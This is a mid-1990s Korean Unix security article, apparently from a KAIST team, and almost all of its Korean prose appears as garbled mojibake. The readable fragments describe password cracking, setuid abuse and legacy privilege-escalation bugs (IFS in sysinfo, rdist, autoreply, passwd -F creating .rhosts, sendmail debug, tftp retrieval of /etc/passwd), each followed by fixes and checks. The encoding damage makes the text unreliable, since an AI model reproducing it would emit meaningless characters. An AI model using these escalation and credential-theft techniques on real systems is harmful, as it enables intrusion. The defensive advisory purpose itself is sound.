Çϱ⠶§¹®¿¡ Æнº¿öµå·Î ÀÔ·ÂÇÑ ±ÛÀÚ¼ö¿Í ¸¶Áö¸· µÎ ±ÛÀÚ°¡ Áß¿äÇÑ Àǹ̸¦ °®°Ô µÈ´Ù. ¾Õ Àý¿¡ ¼­µµ ¸»ÇßÁö¸¸ ÃæºÐÈ÷ ÃßÃøÇÒ ¼ö ÀÖ´Â Æнº¿öµå¸¦ »ç¿ëÇÏ¸é °ï¶õÇÏ´Ù. ¶Ç /etc/passwd ÆÄÀϷκÎÅÍ Æнº¿öµå¸¦ ÃßÃøÇØ ÁÖ´Â Åøµé( Crack À̶óµçÁö Cops)À» »ç¿ëÇØ ¾Ë¾Æ³¾ ¼öµµ ÀÖ´Ù. ÀÌ ÅøµéÀº ÀڽŵéÀÇ µ¶Æ¯ÇÑ ¾Ë°í¸®ÁòÀ» »ç¿ëÇϴµ¥, À̸¦ Å×¸é »çÀü¿¡ ³ª¿À´Â ´Ü¾îµéÀ̳ª, ID¸¦ µÚÁý¾î ´ëÀÔÇغ»´ÙµçÁö, Æнº¿ö µå ÆÄÀÏ¿¡¼­ ¾Ë¾Æ³½ ÀÚ·áµéÀ» ´ëÀÔÇغ»´ÙµçÁö ÇÏ´Â ¹æ¹ýÀÌ´Ù. ¹°·Ð ´ëÀÔÀ» ÇÒ ¶§¿¡´Â crypt() ÇÔ¼ö¸¦ ÀÌ¿ëÇØ encrypt(¾Ïȣȭ)ÇÑ ´ÙÀ½ ÀÌ °á°ú¸¦ /etc/passwd ÆÄÀÏ¿¡ ÀÖ´Â µÎ¹ø° fieldÀÎ º¯ÇüµÈ ºÎºÐ°ú °è¼Óºñ±³ÇØ ¸Â´ÂÁö¸¦ È®ÀÎÇس»°Ô µÈ´Ù. ÀÌ·± ÀÌÀ¯·Î ÀÎÇØ ÈçÈ÷ Àϻ󿡼­ ¾²´Â ´Ü¾îµéÀº Àû¹ßµÉ ¿ì·Á°¡ ³ôÀºµ¥, ÁÁÁö ¾ÊÀº Æнº¿öµå·Î¼­ ´ÙÀ½°ú °°Àº »ç·Ê¸¦ µé ¼ö ÀÖ´Ù . ÁÁÁö¾ÊÀº Æнº¿öµåÀÇ ¿¹ * ID¿Í °°Àº password * »ç¿ëÇÏ´Â ½Ã½ºÅÛÀÇ À̸§ * ÄÄÇ»ÅÍ È£½ºÆ®ÀÇ À̸§ * ¿µ¾î»çÀü¿¡ ³ª¿À´Â ´Ü¾î (boss , world .... ) * ÀüÈ­¹øÈ£ * »ýÀÏ * Å°º¸µåÀ§ÀÇ °°Àº ¼±»ó¿¡ ÀÖ´Â ±Û¼èµéÀÇ ¿¬¼Ó.(qwert,asdf .....) * µ¿ÀÏÇÑ ±ÛÀÚÀÇ ¿¬¼Ó (11111, eeeee .... ) setuid¶õ ¹«¾ùÀΰ¡? /etc/passwdÀÇ ¼ÒÀ¯ÁÖ´Â ºÐ¸íÈ÷ È£½ºÆ® °ü¸®ÀÚ(root)ÀÌ´Ù. ¶ÇÇÑ ¿ì¸®´Â Æнº¿öµå¸¦ ¹Ù²Û ´ÙÀ½ º¯°æµÈ ³»¿ëÀ» /etc/passwd ÆÄÀÏ ¿¡ ÀúÀåÀ» ÇÏ°í ÀÖ´Ù. ÀÌ»óÇÏÁö ¾ÊÀº°¡? º¸ÅëÀÇ ¿¹¶ó¸é permission denied ¶ó´Â ´«¿¡ ÀÍÀº ¸Þ½ÃÁö°¡ ¶°¾ß ÇÒ ÅÙµ¥ ¸»ÀÌ´Ù. ¿©±â ¿¡ ¾ÆÁÖ Áß¿äÇÑ ³»¿ëÀÌ ´ã°Ü ÀÖ´Ù. ¹Ù·Î setuid¶ó´Â °ÍÀÌ´Ù. ´ÙÀ½À» ¼öÇà½ÃÄÑ º¸ÀÚ. % ls -al /bin/passwd rwsr-xr-x 2 root 512 Jan 11 12:31 passwd ¾Õ¿¡¼­ ¼³¸íÀÌ Àß µÆ°ÚÁö¸¸ setuid bit·Î¼­ s°¡ Ç¥½ÃµÅ ÀÖÀ½À» ¾Ë ¼ö ÀÖ´Ù. ÀÌ´Â ÀÌ ÇÁ·Î±×·¥ÀÌ ½ÇÇàµÇ´Â µ¿¾ÈÀº ·çÆ®ÀÇ ±ÇÇÑÀ» °¡Áú ¼ö ÀÖ°Ô µÇ¸ç ÇÁ·Î±×·¥ÀÌ ³¡³²°ú µ¿½Ã¿¡ ÀÌ ±ÇÇÑÀº »ç¶óÁö°Ô µÈ´Ù. ±×·± ÀÌÀ¯·Î Æнº¿öµå¸¦ ÀÌ¿ëÇØ /etc/passwd ÆÄÀÏÀ» ¿ì ¸®°¡ ¹Ù²Ü ¼ö ÀÖ´Â °ÍÀÌ´Ù. ¿ì¸®´Â ÀÌ·± setuid¸¦ ¸¹ÀÌ ÀÌ¿ëÇÏ°í ÀÖ´Ù. ·Î±×ÀÎ ÇÁ·ÒÇÁÆ®°¡ ³ª¿ÔÀ» ¶§ ¿ì¸®´Â »ý°¢¾øÀÌ ·Î±×ÀÎÀ» ÇÏÁö¸¸ ³»ºÎ¿¡¼­´Â »ó´çÈ÷ º¹ÀâÇÑ ±¸µ¿ÀÌ ÀÌ·ïÁö°í ÀÖ´Ù. ¿ì¼± login À̶ó´Â ¸Þ½ÃÁö ´ÙÀ½¿¡ µé¾î¿À´Â »ç¿ëÀÚÀÇ ID¸¦ ÀÐ¾î µéÀδÙ. ±×¸®°í Æнº¿öµå¸¦ ÀÐ¾î µéÀ̴µ¥ ÀоîµéÀÎ Æнº¿öµå¸¦ crypt() ÇÔ¼ö¸¦ ÀÌ¿ëÇØ ¾Ïȣȭ½ÃŲ´Ù. ÀÌ ¾ÏȣȭµÈ Æнº¿öµå¸¦ /etc/pas sword(Shadowing passwd ÀÎ °æ¿ì´Â ´Ù¸¥ ÆÄÀÏ À̸¦Å׸é passwd.adjunct °°Àº ´Ù¸¥ ÆÄÀÏÀ» ÂüÁ¶ÇÑ´Ù.)ÀÇ µÎ¹ø° field¿Í ºñ±³ÇØ °°À¸¸é ¿Ã¹Ù¸¥ Æнº¿öµå¸¦ ÀÔ·ÂÇßÀ¸¹Ç·Î loginÀ» Çã°¡ÇØÁØ´Ù. ´Ù½Ã ls /bin/loginÀ» Çغ¸¸é ¾Ë°ÚÁö¸¸ ÀÌ loginµµ root ¼ÒÀ¯ÀÇ se tuid bit°¡ ºÙÀº ÆÄÀÏÀÌ´Ù. ¿©±â¼­ ¾Ë¾ÆµÖ¾ß ÇÒ Á¡Àº Æнº¿öµå¸¦ È®ÀÎÇÒ ¶§ /etc/passwd ÆÄÀÏÀÇ µÎ ¹ø° field¸¦ Ç®¾î¼­ ÀÔ·ÂµÈ Æнº¿öµå¿Í ¸ÂÃç º¸´Â °Ô ¾Æ´Ï¶ó´Â Á¡ÀÌ´Ù. ÀÌ·± decrypt ÇÔ¼ö´Â ¾øÀ¸¸ç ¾Ë°í¸®Áòµµ Á¸ÀçÄ¡ ¾Ê´Â´Ù. ÀÌ·Î ÀÎÇØ ºÒ¿ÏÀüÇÏÁö¸¸ À¯´Ð½ºÀÇ º¸¾ÈÀÌ ÀÌ·ïÁö°í ÀÖ ´Â °ÍÀÌ´Ù. ¶ÇÇÑ ¾Õ¿¡¼­ À̾߱âÇßÁö¸¸ ·çÆ® ¼ÒÀ¯ÀÌ°í setuid°¡ ½ÇÇàµÇ´Â µ¿¾ÈÀº ½Ã½ºÅÛ°ü¸®ÀÚÀÇ ±ÇÇÑÀ» °®´Â´Ù°í Çß´Ù. ¿ì¸®´Â ÀÌ°ÍÀ» º¸°í effective uid¶ó°í ÇÑ´Ù. ÇØÄ¿µéÀº ÀÌ·± ·çÆ® ¼ÒÀ¯ÀÇ setuid bit ÆÄÀϵéÀ» ½ÇÇà½ÃÅ°´Â µ¿¾È ÀÎÅÍ·´Æ®¸¦ °É ¼ö ÀÖ´Â ½© ½ºÅ©¸³ Æ®¶óµç°¡ ÅøÀ» ÀÌ¿ëÇØ ÀÌ ÆÄÀϵéÀÇ ½ÇÇàÀ» ÁßÁö½ÃŲ »óÅ·ΠÀÖ°Ô ÇÑ´Ù. Áï rootÀÇ ±ÇÇÑÀ» °¡Áø ä·Î ÀÖµµ·Ï ÇÏ´Â °ÍÀÌ´Ù. ÀÌ·± ½ÄÀ¸·Î ÇØ rootÀÇ ±ÇÇÑÀ» ºÒ¹ýÀûÀ¸·Î ȹµæÇÏ´Â °ÍÀÌ ´ëºÎºÐÀÇ ÇØÅ·¹æ¹ýÀÌ´Ù. °ú°ÅÀÇ ÇØÅ· À¯Çüµé ¿¹Àü¿¡´Â ÁÖ·Î ³×Æ®¿öÅ©»óÀ̳ª ·ÎÄà ȣ½ºÆ®»ó¿¡¼­ config urationÀÌ À߸øµÈ °ÍÀ» ÀÌ¿ëÇØ °ü¸®ÀÚÀÇ ±ÇÇÑÀ» ¾ò´Â Ãʺ¸ÀûÀÎ ÇØÅ·ÀÌ ¸¹¾Ò´Ù. Áï, OS¸¦ ÀνºÅçÇϸé ÇÁ·Î±×·¥µéÀÇ Æ۹̼ÇÀÌ ÀûÀý È÷ Á¶Á¤ ¾ÈµÅÀÖ´Â °æ¿ì°¡ ¸¹Àºµ¥, À̸¦ ¾Ç¿ëÇØ È£½ºÆ® °ü¸®ÀÚ¸¸ÀÌ º¸°í ¾µ ¼ö ÀÖ´Â ÆÄÀϵµ ¸¶À½´ë·Î Á¶ÀÛÇÏ´Â °æ¿ì°¡ ¿¹ÀüÀÇ ÇØ Å· À¯ÇüÀ̾ú´Ù. ¶ÇÇÑ ¿ôÁö ¸øÇÒ ¾ê±â·Î ÇØÅ·½Ãµµ¸¦ Çصµ °è¼Ó ½ÇÆÐÇÏ°Ô µÇÀÚ, ±â°è¸¦ µé°í ÈÉÃÄ ´Þ¾Æ³­ µµµÏÇØÄ¿(?) µµ ÀÖ´Ù. ±âÃÊ Áö½ÄÀ» ¾Ë¾Ò´Ù¸é ¿¹Àü¿¡ ÀÖ¾ú´ø ÇØÅ·À¯Çü°ú, ¿¹ÀüÀÇ ¹ö±×µéÀ» »ìÆ캸ÀÚ. ¹°·Ð ¾ð·Ð¸ÅüÀÇ ¼º°Ý»ó ÇöÀç °¡Àå ½É°¢ÇÑ È¦(º¸ ¾È±¸¸Û)µéÀº ½ÆÁö ¾Ê¾Ò´Ù. ¶ÇÇÑ ºÐ·®»ó ¼ö¸¹Àº ¹ö±×µéÁß ±ØÈ÷ ÀϺκи¸À» ´Ù·ç¾ú´Ù. /usr/local/bin/sysinfo version 1.0.0 ÀÇ ¹ö±× À¯´Ð½º ½Ã½ºÅÛ¿¡´Â IFS(Internal File Seperator)¶ó´Â ȯ°æ º¯¼ö°¡ ÀÖ´Ù. ÀÌ°ÍÀÌ shell º¯¼ö·Î ¼±¾ðÇÒ ¶§ ¿©·¯ ¹®Á¦¸¦ ÀÏÀ¸Å°´Â °æ¿ì°¡ ¸¹´Ù. IFS¶ó´Â ȯ°æº¯¼ö¸¦ ³»ºÎ À¯ÀúµéÀÌ ¸¶À½´ë·Î Á¶ÀÛÇØ °ü¸®ÀÚÀÇ ±ÇÇÑÀ» ¾ò¾î³¾ ¼ö Àִµ¥ ÀÌ·¯ÇÑ À¯ÇüÀÇ ÇØÅ·À¸·Î ´Â loadmodule ÇØÅ·, expreserve ÇØÅ·, rdist ÇØÅ· µîÀÌ ÀÖ´Ù. ÀÌ´Â ´Ü¼øÈ÷ ½© º¯¼öÁß IFS¸¦ /·Î ¼±¾ðÇÏ°í (½©¸¶´Ù ´Ù¸£°ÚÁö¸¸ ¿¹¸¦ µé¾î csh À̶ó¸é % setenv IFS /) ¸î°¡Áö Æ®¸¯À» ÅëÇØ ÀϹÝÀ¯ÀúµéÀÌ ½±°Ô rootÀÇ ±ÇÇÑÀ» °¡Áú ¼ö ÀÖ°Ô µÈ´Ù. ÇØ°áÃ¥ : sysinfo ¹öÀü 2.0.6 À» ±¸Çؼ­ »õ·Î ÀνºÅç ÇÑ´Ù. rdist ¹ö±× SunOS 4.1.2¿Í ±× ÀÌÀüÀÇ OS, A/UX 2.0.1, SCO 3.2v4.2, BSD NET/2 °è¿­ Systems ¶Ç´Â BSD rdist¸¦ Áö¿øÇÏ´Â ´ëºÎºÐÀÇ ½Ã½ºÅÛ¿¡ ¼­ /usr/ucb/rdist³ª /usr/bin/rdist´Â º¸¾È¿¡ ¹®Á¦°¡ µÇ´Â ¹ö±×¸¦ °¡Áö°í ÀÖ´Ù. rdist´Â popen(3) À̶ó´Â ³»ºÎ ½Ã½ºÅÛ ÇÔ¼ö(C function)À» ÀÌ¿ëÇØ ÇØÅ·À» ÇÏ°Ô µÈ´Ù. À̶§ ÇØÅ·À» À§ÇØ ÀÌ¿ëÇÏ´Â sendmail À̶õ ÇÁ·Î±×·¥Àº root ÀÇ ±ÇÇÑÀ» °®°í ½ÇÇàÀÌ µÇ°Ô µÈ´Ù. ÀÌ ¿ª½Ã setuid ¶§¹®Àε¥ À̸¦ ¾Ç¿ëÇÏ¿© ¾î¶² À¯Àú¶óµµ root °¡ µÉ ¼ö ÀÖ´Ù . ÇØ°áÃ¥ : SunOsÀÇ Patch-ID# 100383-06 ÀÇ ÆÐÄ¡¸¦ °¡Á®¿Í¼­ ¼³Ä¡Çϸé ÇØ°áÀÌ µÈ´Ù. ¶Ç´Â rdistÀÇ ±â´ÉÀ» ¾ø¾Ö±â À§ÇØ setuid bi t¸¦ Á¦°ÅÇϰųª Æ۹̼ÇÀ» 0À¸·Î Çعö¸°´Ù. autoreply ¹ö±× /usr/local/bin/autoreply´Â elm ÆÐÅ°ÁöÀÇ ¼³Ä¡¿¡¼­ ºÎ¼öÀûÀ¸·Î µû¶ó³ª¿À´Â ÇÁ·Î±×·¥ÀÌ´Ù. elmÀÇ ¹ö±×´Â ¸ðµç OS¿¡¼­ °øÅëÀûÀ¸ ·Î ÁöÀûµÇ´Â ¹®Á¦Á¡ÀÌ´Ù. µû¶ó¼­ ÀÌ ¹ö±×´Â ´ë´Ù¼öÀÇ ÇØÄ¿µé¿¡°Ô ´ë´ÜÇÑ »ç¶û(?)À» ¹Þ¾Ò´ø ¹ö±×ÀÌ´Ù. ÀÌ ¹ö±×´Â ¶ÇÇÑ OS¿¡ °ü°è ¾øÀÌ Elm Mail SystemÀ» ¾²±â¸¸ ÇÏ¸é º¸¾ÈÀÇ ÇêÁ¡À» °¡Áö°Ô µÈ´Ù´Â µ¥¿¡¼­ ÁÖ¸ñÇÒ ¸¸ÇÏ´Ù. ¿ª½Ã setuidÀÇ ¼öÇàÁß ÀÎÅÍ·´Æ®¸¦ °É ¾î rootÀÇ ±ÇÇÑÀ¸·Î ÇÁ·Î±×·¥ÀÌ ÀÛµ¿ÇÏ´Â »óÅ¿¡¼­ ÀÚ½ÅÀÌ ¿øÇÏ´Â ÀÛ¾÷À» ¼öÇàÇϵµ·Ï Á¶ÀÛÇÑ´Ù. À̸¦ ÀÌ¿ëÇØ ¿øÇÏ´Â °÷¿¡ ÀÓÀÇÀÇ ÆÄÀÏÀ» ±â·ÏÇÒ ¼ö ÀÖ´Ù. À̸¦ ÀÌ¿ëÇØ root µð·ºÅ丮¿¡ .rhosts¿¡ Á¶ÀÛÀ» ÇÏ´Â °æ¿ì°¡ ´ëºÎºÐÀÌ´Ù. ÇØ°áÃ¥ : ÇöÀç·Î¼­ÀÇ °¡Àå ÁÁÀº ÇØ°áÃ¥Àº ¾Æ¿¹ autoreplyÀÇ Æ۹̼ÇÀ» 0À¸·Î ÁÖ¾î »ç¿ëÀ» ¸øÇÏ°Ô Çعö¸®´Â °ÍÀÌ´Ù. ÇÏÁö¸¸ ÆÛ¹Ì ¼ÇÀ» 666À¸·Î µÎ´Â °Íµµ ¾ÈÀüÇÏ´Ù. binmail(/usr/bin/mail)ÀÇ ¹ö±× ÀÌ´Â ½ã OS 4.1.xÀÇ ¹öÀü¿¡¼­ Àû¿ëµÇ´Â ¹ö±×ÀÌ´Ù. ÀÌ´Â ÆÄÀÏ ½Ã½ºÅÛÀÇ ¾î´À °÷¿¡¶óµµ ÀÓÀÇÀÇ ÆÄÀÏÀ» »ý¼º½Ãų ¼ö À־ ÀÏ¹Ý À¯ÀúµéÀÌ root°¡ µÉ ¼ö ÀÖ´Ù. ÀÌ ¹ö±×´Â /var/spool/mailÀÇ µð·ºÅ丮 Æ۹̼ÇÀÌ rwxrwxrwt(ȤÀº rwxrwxr-x)·Î ¸ðµç À¯Àú¿¡°Ô ¾²±â ±ÇÇÑÀÌ Çã°¡µÅÀֱ⠶§¹®¿¡ ¾ß±âµÆ´ø ¹ö±×ÀÌ´Ù. ÇØ°áÃ¥ : 1. vendor µé¿¡°Ô¼­ patch ¸¦ ±¸ÇÑ´Ù. 2. °¡Àå ÀÌ»óÀûÀ¸·Î ÇØ°áÀ» ÇÏ´Â °ÍÀº mail spool µð·ºÅ丮ÀÇ ¾²±â ±ÇÇÑÀ» ¾Æ¿¹ ¾ø¾Ö¹ö¸®´Â °ÍÀ̳ª, ÀÌ ¾²±â ±ÇÇÑÀÌ ¾ø´Ù¸é elmÀ̳ª /bin/mail, /usr/ucb/Mail À» »ç¿ëÇÒ ¼ö ¾ø°Ô µÈ´Ù. passwd(/usr/bin/passwd)ÀÇ ¹ö±× /bin/passwd -FÀÇ ¹ö±×¶ó°íµµ ÇÏ´Â ÀÌ°ÍÀº SunOS 4.1.xÀÇ ±âÁ¾¿¡¼­ ÇØ´çµÇ´Â ¹ö±×ÀÌ´Ù. ¾î¶°ÇÑ ÀÏ¹Ý À¯Àú¶óµµ À§ÀÇ ¹ö±×¸¦ ÀÌ ¿ëÇØ, ÀÓÀÇÀÇ ÆÄÀÏ(¹°·Ð °ø°ÝÀ» ¸ñÀûÀ¸·Î ÇϹǷΠ/ µð·ºÅ丮ÀÇ .rhosts¸¦ »ý¼º½ÃÅ°´Â °ÍÀÌ´Ù.)À» »ý¼ºÇØ ÀÌ´Â ÆÄÀÏÀÌ »ý¼ºµÇ±â¸¦ ¿øÇÏ´Â µð·ºÅ丮¿¡ symbolic link¸¦ °É¾î³õ°í ÀÚ½ÅÀÌ ¸¸µé°í ½ÍÀº ÆÄÀÏÀ» ÀÌ °÷À¸·Î ¸µÅ©½ÃÄѹö¸®´Â ¹æ¹ýÀ» ÀÌ¿ëÇÏ´Â °ÍÀÌ´Ù. ÇØ°áÃ¥: 1. º¥´õµé¿¡°Ô¼­ ÆÐÄ¡(¹ö±× ¼öÁ¤ ÇÁ·Î±×·¥)¸¦ ±¸Çϵµ·Ï ÇÑ´Ù. 2. passwdÀÇ ½ÇÇàÆÄÀÏ¿¡¼­ -F ¿É¼ÇÀ» »èÁ¦ÇØ °£´ÜÈ÷ ÆÐÄ¡ÇÒ ¼ö ÀÖ´Ù. SunOS 4.X.X /usr/lib/sendmailÀÇ ¹ö±× ÈçÈ÷ SMTP(Simple Mail Transfer Protocol)ÀÇ ¹ö±×¶ó°í ºÒ¸®±âµµ ÇÏ´Â °ÍÀÌ´Ù.ÀüÀÚ¿ìÆí ½Ã½ºÅÛÀº ¿ÜºÎ¸Á°úÀÇ ¿¬°á¿¡ ÇʼöÀûÀÎ À¯Æ¿¸®Æ¼·Î¼­ BSD À¯´Ð½º¿¡´Â ¿ìÆíÀÇ ¹è´Þ°ú ¼ö½ÅÀ» ´ã´çÇÏ´Â sendmail ÇÁ·Î±×·¥ÀÌ Àִµ¥ ÀÌ ÇÁ·Î±×·¥ÀÇ ±¸ ¹öÀü¿¡´Âº¸¾È»óÀÇ ¹®Á¦¸¦ °¡Áö°í ÀÖ´Ù. ÀÌ°ÍÀº ÀÚ½ÅÀÇ È£½ºÆ®ÀÇ 25¹ø Æ÷Æ®¸¦ ¿­¾î º¸¾Æ ¹ö±×°¡ ÀÖ´ÂÁö È®ÀÎÀ» ÇØ º¸¾Æ¾ß ÇÑ´Ù. ÇöÀç BSD 8.6.4 ¹ö ÀüÀº ÀÌ ¹®Á¦Á¡ÀÌ ÀÖ´Â °ÍÀ¸·Î µå·¯³µ´Ù. ÀÌ¹Ì Worm ¿¡¼­ ½É°¢ÇÑ º¸¾È¹®Á¦¸¦ ÀÏÀ¸Å² ¹Ù ÀÖÀ¸¹Ç·Î ÃÖ½ÅÀÇ ¹öÀüÀ¸·Î ¹Ù²Ù¾î Áֱ⠹ٶõ´Ù. ÇØ°áÃ¥ : sendmail ÇÑ±Û ¹öÀüÀ» ÀνºÅçÇÏ¸é µÈ´Ù. sendmail ÇÑ±Û ¹öÀüÀº ftp://cair-archive.kaist.ac.kr/pub/hangul/mail ¿¡¼­ ±¸ÇÒ ¼ö ÀÖ´Ù. 1) telnet <È£½ºÆ® À̸§> 25¸¦ Çؼ­ ÀÚ½ÅÀÇ È£½ºÆ®¿¡ ¼³Ä¡µÈ sendmail ÀÇ ¹öÀü À» È®ÀÎÇÑ´Ù. 2) /etc/aliases³ª /usr/ucb/aliases¿¡¼­ 'decode'¸¦ Á¦°ÅÇÑ´Ù. % cat /etc/aliases decode: "|/usr/bin/uudecode" À§¿Í °°ÀÌ µÇ¾î ÀÖÀ» ¶§´Â À§ ¹®ÀåÀ» ÁÖ¼® ó¸®ÇØÁØ´Ù. ¿Ã¹Ù¸¥ ¿¹ # cat /etc/aliases ... #decode: "|/usr/bin/uudecode" 3) ÇÁ·Î±×·¥¿¡ ¸Þ½ÃÁö¸¦ º¸³»´Â °æ¿ì ½© ¸í·ÉÀ» º¸³»´Â ¹æ¹ýÀ» »ç¿ëÇÏÁö ¾Êµµ·Ï ÇÑ´Ù. 4) sendmail.cf ¿¡¼­ 'wizard' Æнº¿öµå¸¦ »ç¿ëÇÏÁö ¾Ê´Â´Ù. 5) sendmail ¿¡¼­ 'debug' ¸í·ÉÀ» ÀÌ¿ëÇÏÁö ¾Ê´Â´Ù, ´ÙÀ½À» ÂüÁ¶Çϵµ·Ï ÇÑ´Ù. baikdu % telnet localhost 25 Connected to localhost. Escape character is '^]'. 220-baikdu.kaist.ac.kr Sendmail 8.6.9H1/Baikdu_KAIST_CSH ready at Thu, 16 Mar 1995 00:58:23 +0900 220 ESMTP spoken here debug 500 Command unrecognized wiz 500 Command unrecognized kill 500 Command unrecognized quit 221 baikdu.kaist.ac.kr closing connection Connection closed by foreign host. ¸¸ÀÏ 'debug'¿¡ '200 Debug set'À¸·Î ÀÀ´äÇÑ´Ù¸é »õ ¹öÀüÀ¸·Î ±³Ã¼Çϱ⠹ٶõ´Ù. tftp ¹ö±× tftp(Trivial ftp)´Â µð½ºÅ© ¾ø´Â ¿öÅ©½ºÅ×À̼ǵéÀÇ ³×Æ®¿öÅ© ºÎÆ®±â´ÉÀ¸·Î À¯Àúµ¥ÀÌÅͱ׷¥ ¹æ½ÄÀÇ Á¢¼Ó¾ø´Â ÇÁ·ÎÅäÄÝÀ» ÀÌ¿ëÇÑ ´Ù. ÀÌ´Â ´Ü¼øÇÑ ÇÁ·ÎÅäÄÝÀ̹ǷΠº¸¾È»óÀÇ ÇêÁ¡À» °¡Áö°í ÀÖ´Ù. tftp ¼³Ä¡¸¦ À߸øÇسõ¾ÒÀ» °æ¿ì ¿ÜºÎÀÇ ÇØÄ¿°¡ tftp¸¦ ÀÌ¿ëÇØ /e tc/passwd ÆÄÀÏÀ» °¡Á®°¥ ¼ö°¡ ÀÖ´Ù. ÀÚ½ÅÀÇ È£½ºÆ®¿¡ ¼³Ä¡µÈ tftp°¡ ¾ÈÀüÇÑÁö¸¦ get /etc/passwd¸¦ ÀÌ¿ëÇØ È®ÀÎÇغ¸±â ¹Ù¶õ´Ù. [baram-sakai 193 ] tftp baram.kaist.ac.kr tftp> status Connected to baram.kaist.ac.kr. Mode: netascii Verbose: off Tracing: off Rexmt-interval: 5 seconds, Max-timeout: 25 seconds tftp> get /etc/passwd Error code 1: File not found tftp> À§¿Í °°ÀÌ ¿¡·¯¸Þ½ÃÁö°¡ ¶ßÁö ¾Ê´Â´Ù¸é ¼³Ä¡°¡ À߸øµÈ °ÍÀÌ´Ï ¼öÁ¤Çϱ⠹ٶõ´Ù. ¸¸ÀÏ ¾²Áö ¾Ê´Â´Ù¸é ¾Æ¿¹ Æ۹̼ÇÀ» 0À¸·Î µÎ¾î ÀÛµ¿À» ¸øÇÏ°Ô Çϵ簡 /etc/inetd.conf ¸¦ ´ÙÀ½°ú °°ÀÌ µÐ´Ù. tftp dgram udp wait nobody /usr/etc/in.tftpd in.tftpd -s /tftpboot TCP_WRAPPER¸¦ »ç¿ëÇÏ´Â °Íµµ ¸¹Àº µµ¿òÀÌ µÈ´Ù. º¸¾È°ü·Ã FAQ ÇØÄ¿°¡ ħÀÔÇϱ⠰¡Àå ÁÁÀº ½Ã±â¿Í ȯ°æÀº? Àü»ê¸ÁÀ» ±¸¼ºÇÏ´Â ³×Æ®¿öÅ©ÀÇ ³¡¿¡´Â ³×Æ®¿öÅ©¸¦ ±¸¼ºÇϱâ À§ÇÑ ÄÄÇ»Å͵é(È£½ºÆ®)µéÀÌ ºÙ¾î ÀÖ¾î¾ß ÇÏ°í ÀÌ È£½ºÆ®µéÀº ¿î¿µÃ¼ Á¦¸¦ µ¹¸®°Ô ¸¶·ÃÀÌ´Ù. ÇÏÁö¸¸ OS ´Â Àΰ£ÀÌ Â§ ÇÁ·Î±×·¥ÀÎ ÀÌ»ó ¹ö±×°¡ ÀÖ°Ô ¸¶·ÃÀÌ°í ÀÌ ¹ö±×·Î ¸»¹Ì¾Ï¾Æ º¸¾È»óÀÇ ¹®Á¦°¡ À¯ ¹ßµÇ´Â °ÍÀÌ´Ù. À¯´Ð½º ½Ã½ºÅÛ°ú °°ÀÌ ¸ÖƼÀ¯ÀúµéÀÌ »ç¿ëÇÏ´Â ½Ã½ºÅÛÀº º¸¾È»ó ¿Ïº®ÇØÁú ¼ö ¾ø´Ù´Â °ÍÀÌ ¼öÇÐÀûÀ¸·Î Áõ¸íÀÌ µÆ´Ù . ´õ±º´Ù³ª ÀÌ È£½ºÆ®¸¦ ³×Æ®¿öÅ©»ó¿¡ ¿¬°áÇسõ°Ô µÇ¸é ´õ ¹®Á¦°¡ ÀϾ°Ô µÇ´Âµ¥,È£½ºÆ® ³»ºÎÀÇ ¹ö±×¸¦ ÆÐÄ¡ÇÏÁö ¾ÊÀºÃ¤ ³×Æ®¿ö Å©»ó¿¡ ¿Ã·Á ³õ°Ô µÇ¸é '¹äÀ» Â÷·Á ³õ¾ÒÀ¸´Ï ¹äÀ» ¸Ôµµ·Ï ÇϽÿÀ'¶ó°í ÇØÄ¿µé¿¡°Ô ³»ÁÖ´Â ¼ÀÀÌ µÈ´Ù. ±×·¡¼­ °¡Àå ¿Ïº®ÇÏ°Ô º¸¾È À» À¯ÁöÇÏ°í ½ÍÀ¸¸é ³×Æ®¿öÅ©¿¡ ¿Ã·Á³õ±â Àü¿¡ ³»ºÎ Ȧ(hole)À» ¿ÏÀüÈ÷ ÆÐÄ¡¸¦ ÇÏ°í, ±× ´ÙÀ½¿¡ ³×Æ®¿öÅ©¿¡ ¿¬°áÇسõ´Â °ÍÀÌ ÁÁ ´Ù. OS¸¦ °« ÀνºÅçÇÏ°í³­ Á÷ÈÄ¿¡´Â OSÀÇ ¹ö±×µéÀÌ ¾ÆÁ÷ ³²¾Æ ÀÖ´Â »óÅ¿©¼­ ÀÌ ¶§ ÇØÄ¿µé¿¡°Ô ħÀÔÀ» ¹Þ°Ô µÇ¸é ¼Ó¼ö¹«Ã¥ÀÌ µÈ´Ù. ¶ÇÇÑ ºÒÇÊ¿äÇÑ ¼­ºñ½º¸¦ ¸¹ÀÌ ÇÏ´Â °æ¿ì ÇØÄ¿µéÀÌ Ä§ÀÔÀ» Çϱ⠴õ ÁÁ¾ÆÁö°Ô µÇ¹Ç·Î, °¡±ÞÀûÀÌ¸é ºÒÇÊ¿äÇÑ ¼­ºñ½º´Â ÇÏÁö ¾Ê´Â °Í ÀÌ ÁÁ´Ù.(guest ¾ÆÀ̵ð Á¦°øÀ̳ª sonnim ¾ÆÀ̵ð Á¦°ø °°Àº °æ¿ì) º¸¾ÈÀ» °­È­ÇØÁÖ´Â µµ±¸¿¡´Â ¾î¶² °ÍÀÌ ÀÖ³ª (ȤÀº º¸¾ÈÀ» ÀÚµ¿È­ÇØÁÖ´Â ÇÁ·Î±×·¥Àº?) ¿ì¼± º¸¾ÈÀ» ÀÚµ¿È­ÇØÁÖ´Â ÅøÀº ÀÖÀ» ¼öµµ ¾ø°í, À־µµ ¾ÈµÇ°í, ÀÖÁöµµ ¾Ê´Ù. Àü¼¼°èÀûÀ¸·Î ÄÄÇ»ÅÍ º¸¾ÈÀº È°¹ßÇÑ ¿¬±¸ÀÇ ´ë»óÀÌ µÇ°í ÀÖ´Ù. ftp://cert.orgÀ̳ª, ftp://coast.cs.purdue.edu µî¿¡¼­ ÁÁÀº ÅøÀ» ¾òÀ» ¼ö ÀÖ°í ¶Ç KUS ÆÀ µµ ¼­¼­È÷ Åø °³¹ßÀ» ½ÃÀÛÇÏ°í ÀÖ´Ù. º¸¾Èµµ±¸´Â Å©°Ô Á¡°Ëµµ±¸¿Í °¨½Ãµµ±¸·Î ³ª´²Áö´Âµ¥ ´Ù½Ã ·ÎÄà ȣ½ºÆ®¿ë°ú ³×Æ®¿öÅ©¿ëÀ¸·Î ³ª´­ ¼ö ÀÖ´Ù. Local host check : cops, tiger, crack monitor: tripwire, ttywatcher Network check : satan, iss, nfsbug, ypx monitor: netlog ÇØÄ¿°¡ ÄÄÇ»ÅÍ¿¡ ħÀÔÇÏ´Â ¹æ¹ý¿¡´Â ¾î¶² °ÍÀÌ ÀÖ³ª null & default passwd account or passwd guessing tftp attack ethernet sniffing /etc/hosts.equiv exploit (ƯÈ÷ SunOS 4.1.x) 